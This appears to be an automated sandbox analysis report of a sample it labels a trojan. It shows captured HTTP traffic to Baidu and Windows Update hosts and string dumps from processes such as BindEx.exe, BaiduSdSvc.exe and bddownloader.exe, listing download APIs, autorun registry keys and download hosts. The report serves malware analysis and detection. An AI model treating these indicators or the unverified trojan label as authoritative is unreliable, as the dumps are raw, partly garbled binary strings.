...z.......-" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@..;....T.O....q....I..l,z .....D..........&D...'.R.....&G78oC.....HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.......-" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...@..;....T.O....q....I..l,z .....D..........&D...'.R.....&G78oC.........

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 156

Content-Type: application/octet-stream

Host: s.x.baidu.com

Keep-Alive: timeout=600,max=1000

...x........" b58974f666e28edaba3814768157053d(.........28..7

....K.d.....Zv..S....(,.6.2...C....b.K....{....j...8.@.H.P.X.` ............i~o

E%(.1bxaK..ua

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 156

...x........" b58974f666e28edaba3814768157053d(.........28..7......K.d.....Zv..S....(,.6.2...C....b.K....{....j...8.@.H.P.X.` ............b.&......Q.....D.7HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 156.....x........" b58974f666e28edaba3814768157053d(.........28..7......K.d.....Zv..S....(,.6.2...C....b.K....{....j...8.@.H.P.X.` ............b.&......Q.....D.7..

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 158

Content-Type: application/octet-stream

Host: s.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......t&........^....m@{n.Fj..

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 158

...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......P.".K5..}.....9......-.mHTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 158.....z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......P.".K5..}.....9......-.m..

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 390

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..Jg.m..3E......1 ...a...\.....;V.....$..:t7.......v....8.@.H.P.X...` ......$t....o-T....E..u..]m.....-OV..)MA.....t..$ZJx.g...A...a..- ...t.......p8.. 5g..}..L....^..4...........Pl.D....H.X...].;.y..4xL....Y)...@Z-..fh.gH/.T-`...)3..l..#.~..^n..........U....H.yZ...B...,...M6.cO.C...3.t.I.GF.]...kWBi..U....C..3.....d.!.........[X

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 150

...z........" b58974f666e28edaba3814768157053d(.........28..Jg.m..3E......1 ...a...\.....;V.....$..:t7.......v....8.@.H.P.X...` .........}.]CXi.........

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 78

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...B........" b58974f666e28edaba3814768157053d(.........2.8.@.H.P.X...` ......

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 134

...z........" b58974f666e28edaba3814768157053d(.........28..Jg.m..3E......1 ...a...\.....;V.....$..:t7.......v....8.@.H.P.X...` ........

GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT

Accept-Ranges: bytes

ETag: "80179bc4b3cecf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 18

Cache-Control: max-age=7062

Date: Thu, 06 Nov 2014 06:07:48 GMT

Connection: keep-alive

X-CCC: CA

X-CID: 2

1401CFCEB3C4C42958....

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT

Accept-Ranges: bytes

ETag: "805a83f2b9cecf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 56928

Cache-Control: max-age=9525

Date: Thu, 06 Nov 2014 06:07:49 GMT

Connection: keep-alive

X-CCC: CA

X-CID: 2

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT

Accept-Ranges: bytes

ETag: "80179bc4b3cecf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 18

Cache-Control: max-age=7063

Date: Thu, 06 Nov 2014 06:07:47 GMT

Connection: keep-alive

X-CCC: CA

X-CID: 2

1401CFCEB3C4C42958....

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: VVV.download.windowsupdate.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT

Accept-Ranges: bytes

ETag: "805a83f2b9cecf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 56928

Cache-Control: max-age=9526

Date: Thu, 06 Nov 2014 06:07:48 GMT

Connection: keep-alive

X-CCC: CA

X-CID: 2

<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 76

Content-Type: application/octet-stream

Host: d.x.baidu.com

Keep-Alive: timeout=600,max=1000

...@........" b58974f666e28edaba3814768157053d(.........2.8.@.H.P.X.` ......

HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 132

...x........" b58974f666e28edaba3814768157053d(.........28..7......K.d.....Zv..S....(,.6.2...C....b.K....{....j...8.@.H.P.X.` ........

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

BindEx.exe_1568:

.text

`.rdata

@.data

.rsrc

SSShlR@

KERNEL32.dll

MSVCRT.dll

_acmdln

C:\yqkvod5\YqkEveryday.exe

*.txt

%s %s

dlinstlit.txt

URLDownloadToFileA

RegEnumKeyExW

RegDeleteKeyW

RegNotifyChangeKeyValue

RegCloseKey

RegOpenKeyExW

ShellExecuteA

ShellExecuteExA

PathIsURLW

PathIsURLA

GetProcessHeap

@BaiduAnTray.exe

{00890530-6A9F-4be2-B1BB-73F01E2BB986}

{63332668-8CE1-445D-A5EE-25929176714E}

Urlmon

@C:\yqkvod5\FilmAcc.exe

FilmAcc.exe

@*.lnk

1, 0, 0, 1

BindEx.exe

BaiduSdSvc.exe_1500:

.text

`.rdata

@.data

.rsrc

@.reloc

%d.%d.%d

libprotobuf %s %s:%d] %s

..\src\google\protobuf\stubs\common.cc

..\src\google\protobuf\message_lite.cc

CHECK failed: !coded_out.HadError():

..\src\google\protobuf\io\coded_stream.cc

..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc

Content-Length:%d

s.x.baidu.com

c:\clientci\workspace\bdkv_v2.1_fix_compile\avmain_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h

c:\clientci\workspace\bdkv_v2.1_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp

.\update.pb.cc

%s:%u

%u.%u.%u.%u

addr %s not good...

Unsupported Media Type

HTTP Version not supported

HTTP/1.0

HTTP/1.1

1.0.0.1

.\header.pb.cc

https

ftpes

ftps

tftp

% ;?:@=&,$/-_!.~*()

System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

%s\Connection

1.0.1.1

%d.%d

d-d-d d:d:d

RegKey

CryptMsgGetParam

CryptMsgClose

CertFindCertificateInStore

CertFreeCertificateContext

CertCloseStore

CertGetNameStringW

CryptCATCatalogInfoFromContext

RootKey

SubKey

IsNative64Key

%s>

%s="%s"

%s='%s'

version="%s"

encoding="%s"

standalone="%s"

c:\clientci\workspace\bdkv_v2.1_fix_compile\basic\KVOutput\binrelease\BaiduSdSvc.pdb

?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ

BDLogicUtils.dll

BDMFrameWork.dll

SHLWAPI.dll

BDMSkin.dll

GetWindowsDirectoryW

KERNEL32.dll

USER32.dll

RegOpenKeyExW

RegCloseKey

RegCreateKeyExW

ADVAPI32.dll

MSVCP80.dll

PSAPI.DLL

WS2_32.dll

MSVCR80.dll

_amsg_exit

_crt_debugger_hook

USERENV.dll

WTSAPI32.dll

SensApi.dll

InternetCrackUrlW

HttpOpenRequestW

HttpQueryInfoW

HttpSendRequestW

WININET.dll

NETAPI32.dll

VERSION.dll

SHDeleteKeyW

GetProcessHeap

GetSystemWindowsDirectoryW

RegOpenKeyExA

RegEnumKeyExW

RegQueryInfoKeyW

RegSetKeySecurity

RegGetKeySecurity

RegDeleteKeyW

RegFlushKey

RegNotifyChangeKeyValue

SHELL32.dll

ole32.dll

imagehlp.dll

BaiduSdSvc.exe

.?AV?$CSingleton@VCRtpPluginContainer@@@BDMBase@@

.?AVCRtpPluginContainer@@

.?AV?$CSingleton@VCRTPServer@@@utils@@

.?AVCRTPServer@@

.?AVCBDMOptionsReportRecord@@

.?AVCBDMLauchReportRecord@@

.?AVTSMsg@@

.?AVIBDMMsg@@

.?AVTSMsgMap@@

.?AVITSMsgMap@@

.?AVTSMsgDispatcher@@

.?AVITSMsgDispatcher@@

.?AVTSMsgStub@@

.?AVITSMsgStub@@

.?AVheader@http@bena@@

.?AVresponse@http@bena@@

.?AVrequest@http@bena@@

;%;'

7}8q8>9

8Â9V9h9

3F4X4]4r4

9 9$9(9,9094989

5 6$6(6,6064686

HKEY_LOCAL_MACHINE\Software

HKEY_CURRENT_USER\Software\Classes\CLSID

HKEY_CURRENT_USER\Software\Classes\DirectShow

HKEY_CURRENT_USER\Software\Classes\Interface

HKEY_CURRENT_USER\Software\Classes\Media Type

HKEY_CURRENT_USER\Software\Classes\MediaFoundation

HKEY_CLASSES_ROOT\CLSID

HKEY_CLASSES_ROOT\DirectShow

HKEY_CLASSES_ROOT\Interface

HKEY_CLASSES_ROOT\Media Type

HKEY_CLASSES_ROOT\MediaFoundation

explorer.exe

HKEY_LOCAL_MACHINE\Software\Wow6432Node

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation

HKEY_CLASSES_ROOT\Wow6432Node\CLSID

HKEY_CLASSES_ROOT\Wow6432Node\DirectShow

HKEY_CLASSES_ROOT\Wow6432Node\Interface

HKEY_CLASSES_ROOT\Wow6432Node\Media Type

HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation

\BDConfig.dll

winlogon.exe

SOFTWARE\Microsoft\Windows\CurrentVersion

ntdll.dll

BaiduSdTray.exe

"{0}\{1}" {2}

SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

EXPLORER.EXE

Global\BDKVMutex{B2F10594-7119-4649-9326-AF1890C5CE56}

Global\BDKVEvent{8C345A9A-F601-405d-AB4A-B459CD5E369E}

Global\TAV_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}

\\.\pipe\{5EA6312A-0014-4160-AF85-E26361D6281E}

BaiduSd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduSd

\bdkvrtpplugins\RtpContainerConfig.xml

C:\test.exe

d-d-d d:d:d d

d:d:d

%s(%d)

Last Error : %u(%s)

\BDMAVE.dll

Global\BDKVMutex{32EB1BC7-A5CD-4356-A6B1-54D7BF690CA7}

JoinBaiduCloundPlan

\kernel32.dll

Windows 8.1

Windows 8.0

Windows 7

Windows Vista

Windows 7

Windows Vista

Windows Server 2003,

Windows XP

Windows 2000

Windows NT

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009

Windows 95

Windows 98

Windows ME

000%x

\StringFileInfo\%s\FileVersion

BaiduSdUpdate.exe

{X-X-X-XX-XXXXXX}

CD823ABCA-A92F-429d-9E11-3779B5F682AA

BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}

BDMUpdate.dll

BDMNet.dll

.bdtmp

.old_

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0

kernel32.dll

\Global.db

Aiphlpapi.dll

A\\.\PhysicalDrive%d

\\.\Scsi%d:

BHKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

oHKEY_USERS

Wintrust.dll

Crypt32.dll

Software\Microsoft\Windows NT\CurrentVersion\Time Zones\

Software\Microsoft\Windows NT\CurrentVersion\ProfileList\

Software\Microsoft\Windows NT\CurrentVersion\Print\

Software\Microsoft\Windows NT\CurrentVersion\Ports\

Software\Microsoft\Windows NT\CurrentVersion\Perflib\

Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\

Software\Microsoft\Windows NT\CurrentVersion\Language Pack\

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\

Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\

Software\Microsoft\Windows NT\CurrentVersion\Fonts\

Software\Microsoft\Windows NT\CurrentVersion\FontMapper\

Software\Microsoft\Windows NT\CurrentVersion\FontLink\

Software\Microsoft\Windows NT\CurrentVersion\FontDpi\

Software\Microsoft\Windows NT\CurrentVersion\Console\

Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\

Software\Microsoft\Windows\CurrentVersion\Setup\

Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\

Software\Microsoft\Windows\CurrentVersion\Policies\

Software\Microsoft\Windows\CurrentVersion\Group Policy\

Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\

Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\

Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\

Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\

Software\Microsoft\Windows\CurrentVersion\App Paths\

Software\Microsoft\SystemCertificates\

Software\Microsoft\EnterpriseCertificates\

system32\winlogon.exe

D6BE417DD-264A-4678-A036-74D2173ECCEB

2.1.0.3109

BaidusdSvc.exe

netsh.exe_2640:

.text

`.data

.rsrc

msvcrt.dll

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

MPRAPI.dll

ole32.dll

OLEAUT32.dll

RASAPI32.dll

USER32.dll

iphlpapi.dll

[%S] %S

netsh.pdb

RegCloseKey

RegOpenKeyExW

RegCreateKeyExW

RegQueryInfoKeyW

GetProcessHeap

GetConsoleOutputCP

ntdll.dll

NETSH.EXE

MatchCmdLine

MatchTagsInCmdLine

{X-X-X-XX-XXXXXX}

netsh.exe

Error %d in FormatMessageW()

select * from Win32_OperatingSystem

\\%s\root\cimv2

5.1.2600.5512 (xpsp.080413-0852)

Windows

Operating System

5.1.2600.5512

LFirst, add the protocol to the transport, and then add it to the interface.

*The requested transport is not available.

%1!s! ipmontr.dll

The above command installs ipmontr.dll in netsh.

is removed, it is no longer supported by netsh.

The command cannot be executed.

*Windows cannot open the file named %1!s!.

.The commit call to %1!s! cannot be completed.

.Sets the current machine on which to operate.

name - Name of the machine on which to operate

Sets the current machine on which to operate. If a machine name

%1!s! open c:\logfiles\logfile.txt

.Error creating key for %1!s! in the registry.

.Error deleting key for %1!s! in the registry.

BaiduSdTray.exe_2844:

.text

`.rdata

@.data

.rsrc

@.reloc

PSSSSSSh

D$XPSSh

..\src\google\protobuf\message_lite.cc

CHECK failed: !coded_out.HadError():

..\src\google\protobuf\io\coded_stream.cc

%d.%d.%d

libprotobuf %s %s:%d] %s

..\src\google\protobuf\stubs\common.cc

..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc

1.2.5

{C6642F75-8DBE-473d-A98B-940F84EF702C}

.\Global\ReportBase\msg.pb.cc

datapkg.FieldsList

datapkg.DataType

CreateReportClient

ReleaseReportClient

{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}

kernel32.dll

%s>

%s="%s"

%s='%s'

version="%s"

encoding="%s"

standalone="%s"

1.0.1.1

%d.%d

d-d-d d:d:d

RegKey

RootKey

SubKey

IsNative64Key

CryptMsgGetParam

CryptMsgClose

CertFindCertificateInStore

CertFreeCertificateContext

CertCloseStore

CertGetNameStringW

CryptCATCatalogInfoFromContext

Content-Length:%d

s.x.baidu.com

c:\clientci\workspace\bdkv_v2.1_fix_compile\avmain_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h

c:\clientci\workspace\bdkv_v2.1_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp

.\update.pb.cc

%s:%u

%u.%u.%u.%u

addr %s not good...

Unsupported Media Type

HTTP Version not supported

HTTP/1.0

HTTP/1.1

1.0.0.1

.\header.pb.cc

https

ftpes

ftps

tftp

% ;?:@=&,$/-_!.~*()

System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

%s\Connection

c:\clientci\workspace\bdkv_v2.1_fix_compile\basic\KVOutput\binrelease\BaiduSdTray.pdb

BDMSkin.dll

?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ

BDLogicUtils.dll

BDMFrameWork.dll

SHDeleteKeyW

SHLWAPI.dll

GetProcessHeap

SetProcessShutdownParameters

GetWindowsDirectoryW

GetSystemWindowsDirectoryW

KERNEL32.dll

USER32.dll

GDI32.dll

RegOpenKeyExW

RegCloseKey

RegOpenKeyW

RegCreateKeyExW

RegDeleteKeyW

RegFlushKey

RegQueryInfoKeyW

RegEnumKeyExW

RegSetKeySecurity

RegNotifyChangeKeyValue

RegGetKeySecurity

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHELL32.dll

ole32.dll

MSVCP80.dll

MSVCR80.dll

_amsg_exit

_wcmdln

_crt_debugger_hook

PSAPI.DLL

WTSAPI32.dll

USERENV.dll

imagehlp.dll

HttpSendRequestW

InternetCrackUrlW

HttpOpenRequestW

HttpQueryInfoW

WININET.dll

NETAPI32.dll

VERSION.dll

WS2_32.dll

RegOpenKeyExA

BaiduSdTray.exe

.?AVCBDMLauchReportRecord@@

.?AVReportMessageBase@ns_reportbase@ns_global@@

.?AVRegSystemCallPassThrough@ns_common@@

.?AVReportClient@ns_reportbase@ns_global@@

.?AVTSMsg@@

.?AVIBDMMsg@@

.?AVTSMsgMap@@

.?AVITSMsgMap@@

.?AVTSMsgDispatcher@@

.?AVITSMsgDispatcher@@

.?AVTSMsgStub@@

.?AVITSMsgStub@@

.?AVheader@http@bena@@

.?AVresponse@http@bena@@

.?AVrequest@http@bena@@

1%1X1u1{1

7-8}8&9S9x9

1/3E4

9 :-:3:|:

2!313\3|3

5%5X5l5|5

11U1]1q1

77q7

:,:6:>:`:

7&747=7]7

?0?4?8?

6$6,686\6|6

1$1,181\1|1

5 5$5(5,5054585\5

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

\iexplore.exe

\Internet Explorer\iexplore.exe

%s\baidubrowser.exe

HKEY_LOCAL_MACHINE\Software

HKEY_CURRENT_USER\Software\Classes\CLSID

HKEY_CURRENT_USER\Software\Classes\DirectShow

HKEY_CURRENT_USER\Software\Classes\Interface

HKEY_CURRENT_USER\Software\Classes\Media Type

HKEY_CURRENT_USER\Software\Classes\MediaFoundation

HKEY_CLASSES_ROOT\CLSID

HKEY_CLASSES_ROOT\DirectShow

HKEY_CLASSES_ROOT\Interface

HKEY_CLASSES_ROOT\Media Type

HKEY_CLASSES_ROOT\MediaFoundation

HKEY_LOCAL_MACHINE\Software\Wow6432Node

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation

HKEY_CLASSES_ROOT\Wow6432Node\CLSID

HKEY_CLASSES_ROOT\Wow6432Node\DirectShow

HKEY_CLASSES_ROOT\Wow6432Node\Interface

HKEY_CLASSES_ROOT\Wow6432Node\Media Type

HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation

%d.%d.%d.%d

ntdll.dll

EXPLORER.EXE

explorer.exe

UDP-ADM_DRVE_ISTL_FID

UDP-ADM_DRVE_OPEN_FID

bdmantivirus\BDKitUtils.dll

system32\DRIVERS\BDMWrench.sys

BDMNet.dll

BaiduHips.exe

BaiduSdSvc.exe

"%s\BaiduSdSvc.exe" -r

%Program Files% (x86)\Baidu

%Program Files%\Baidu

D:\Program Files (x86)\Baidu

D:\Program Files\Baidu

E:\Program Files (x86)\Baidu

E:\Program Files\Baidu

F:\Program Files (x86)\Baidu

F:\Program Files\Baidu

BaiduAnSvc.exe

"%s\BaiduAnSvc.exe" -r

BDMReport.dll

%s\baidu\baiduan\Config\8001.dat

BaiduAnTray.exe

%s\BaiduHips.exe

BaiduProtect.exe

"%s\BaiduProtect.exe" -r

%Program Files% (x86)\Common Files\Baidu

%Program Files%\Common Files\Baidu

D:\Program Files (x86)\Common Files\Baidu

D:\Program Files\Common Files\Baidu

E:\Program Files (x86)\Common Files\Baidu

E:\Program Files\Common Files\Baidu

F:\Program Files (x86)\Common Files\Baidu

F:\Program Files\Common Files\Baidu

%s\baidu\baidusd\Config\900.dat

\\.\BDMWrench

Global\BDDefenseDriver{80438582-0F66-44E0-3D2B-2D7E872CBFBB}

CD61BB3A-403D-7650-5D9A-4E57EA1035E6

UDP-ADM_KITUTL_PH_SET_INVALID

UDP-ADM_WMWCH_PH_SET_INVALID

UDP-ADM_ST_ID:%d

UDP-ADM_DRVE_RUN

UDP-ADM_CLIENT_RUN

UDP-ADM_CPY_SYS_FID

UDP-ADM_OPEN_SYS_FID

UDP-ADM_INST_SYS_FID

UDP-ADM_SED_PAVER_FID

UDP-ADM_ATR_SET

UDP-ADM_SED_ATR_FID

UDP-ADM_SED_FSD

UDP-ADM_RPT_FID

UDP-ADM_FSD

\BaiduSdSvc.exe

\BaiduAnSvc.exe

UDP-ADM_RPT_INIT_FID

\system32\drivers\BDMWrench.sys

drivers\BDMWrench.sys

UDP-EVT_WFR

UDP-EVT_WFID

UDP-ADM_SED_PAVER2_FID

\BaiduSdTray.exe" -stmd=3

\BaiduAnTray.exe" -stmd=3

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

C9521EC1-6642-5CF6-8FB9-DE04639593BD

UDP-PS_KITUTI_PH_SET_INVALID

UDP-PS_LD_FID

UDP-PL_SRV_ID:%d

UDP-PL_SRV_RUN

UDP-PL_SRV_INSTPH_FID

UDP-PL_SRV_CK_REG_DAMG

UDP-PL_SRV_REPT01_FID

UDP-PL_SRV_REGREPIR_FID

UDP-PL_SRV_PL_FID

UDP-PL_SRV_REPT02_FID

UDP-PL_SRV_FSD

UDP-PL_TRY_ID:%d

UDP-PL_TRY_RUN

UDP-PL_TRY_INSTPH_FID

UDP-PL_TRY_UN_ATRUN

UDP-PL_TRY_REPT01_FID

UDP-PL_TRY_PL_FID

UDP-PL_TRY_REPT02_FID

UDP-PL_TRY_FSD

UDP-PL_RPT_INIT_FID

UDP-ADM_SET_KITU

UDP-ADM_SET_MWR_PATH

UDP-ADM_OS_ERR

UDP-ADM_PROC_DIR_UN_EXIST

UDP-ADM_PROC_GT_VER_FID

UDP-ADM_PROC_MATCH_FID

\BDConfig.dll

hh_debug:%s

BaiduSdUpdate.exe

Wtsapi32.dll

\BaiduAn.exe

\BDKVRecomm.dll

BDMgr.exe -stmd=6

BDMgr.exe -stmd=7

TrayPluginContainerConfig.xml

BDMgr.exe -stmd=7 -selplugin={914438D6-1EC4-434A-B6EC-20F84894C395}

hXXp://anquan.baidu.com/bbs/forum.php?mod=post&action=newthread&fid=40

{E059A29F-D2ED-4f28-849A-851AA9D5A05C}

C:\test.txt

ic_danger.png

BaiduSdBugRpt.exe

BaiduSd.exe

Client.exe

\GameNoDisturb.ini

\PullUpConfig.xml

file='skin_1.png' xtiled='true' ytiled='true'

\BaiduSdSvc.exe -m "

\cmd.exe

Shell32.dll

\BaiduSd.exe

-selplugin=rdp_scan -vll=%s

BaiduSd{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}

100012_1

CheckIco_Select_hor.png

CheckIco.png

ic_menu_logo_hor.png

CheckIco_hor.png

CheckIco_Select.png

MainIco_hor.png

ic_menu_logo.png

MainIco.png

menu.xml

HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduSd

2.1.0.3086

hXXp://anquan.baidu.com/shadu

hXXp://shadu.baidu.com/privacy.html

about.xml

@advapi32.dll

JoinBaiduCloundPlan

SWITCH_CENTER_URLSAFE

000%x

\StringFileInfo\%s\FileVersion

ABDKVMainframe.dll

BDCooly.dll

A\\.\pipe\{5EA6312A-0014-4160-AF85-E26361D6281E}

\StringFileInfo\xx\FileVersion

\kernel32.dll

Windows 8.1

Windows 8.0

Windows 7

Windows Vista

Windows 7

Windows Vista

Windows Server 2003,

Windows XP

Windows 2000

Windows NT

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009

Windows 95

Windows 98

Windows ME

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

okernel32.dll

HKEY_USERS

Software\Microsoft\Windows NT\CurrentVersion\Time Zones\

Software\Microsoft\Windows NT\CurrentVersion\ProfileList\

Software\Microsoft\Windows NT\CurrentVersion\Print\

Software\Microsoft\Windows NT\CurrentVersion\Ports\

Software\Microsoft\Windows NT\CurrentVersion\Perflib\

Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\

Software\Microsoft\Windows NT\CurrentVersion\Language Pack\

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\

Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\

Software\Microsoft\Windows NT\CurrentVersion\Fonts\

Software\Microsoft\Windows NT\CurrentVersion\FontMapper\

Software\Microsoft\Windows NT\CurrentVersion\FontLink\

Software\Microsoft\Windows NT\CurrentVersion\FontDpi\

Software\Microsoft\Windows NT\CurrentVersion\Console\

Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\

Software\Microsoft\Windows\CurrentVersion\Setup\

Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\

Software\Microsoft\Windows\CurrentVersion\Policies\

Software\Microsoft\Windows\CurrentVersion\Group Policy\

Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\

Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\

Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\

Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\

Software\Microsoft\Windows\CurrentVersion\App Paths\

Software\Microsoft\SystemCertificates\

Software\Microsoft\EnterpriseCertificates\

system32\winlogon.exe

GWintrust.dll

Crypt32.dll

6BE417DD-264A-4678-A036-74D2173ECCEB

d-d-d

D823ABCA-A92F-429d-9E11-3779B5F682AA

BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}

BDMUpdate.dll

B.bdtmp

.old_

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0

\Global.db

Ciphlpapi.dll

C\\.\PhysicalDrive%d

\\.\Scsi%d:

0123456789

BaidusdTray.exe

bddownloader.exe_3300:

.text

`.rdata

@.data

.rsrc

8%uvP

;*u.SUj

PSSSSSSh

>.uTV

j SSSSSSSh

aSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

YYtCP

asio.ssl

asio.misc

D:\dl\boost_1_44_0_build\include\boost/exception/detail/exception_ptr.hpp

asio.misc error

asio.ssl error

dtrp.download.iyuntian.com

res.download.iyuntian.com

tk.download.iyuntian.com

utk.download.iyuntian.com

thread.exit_event

thread.entry_event

%s\Connection

System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

VVV.baidu.com.cn

HTTP/1.1

$MD5Version: 1.0.0 November-19-1997 $

$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $

%s>

standalone="%s"

encoding="%s"

version="%s"

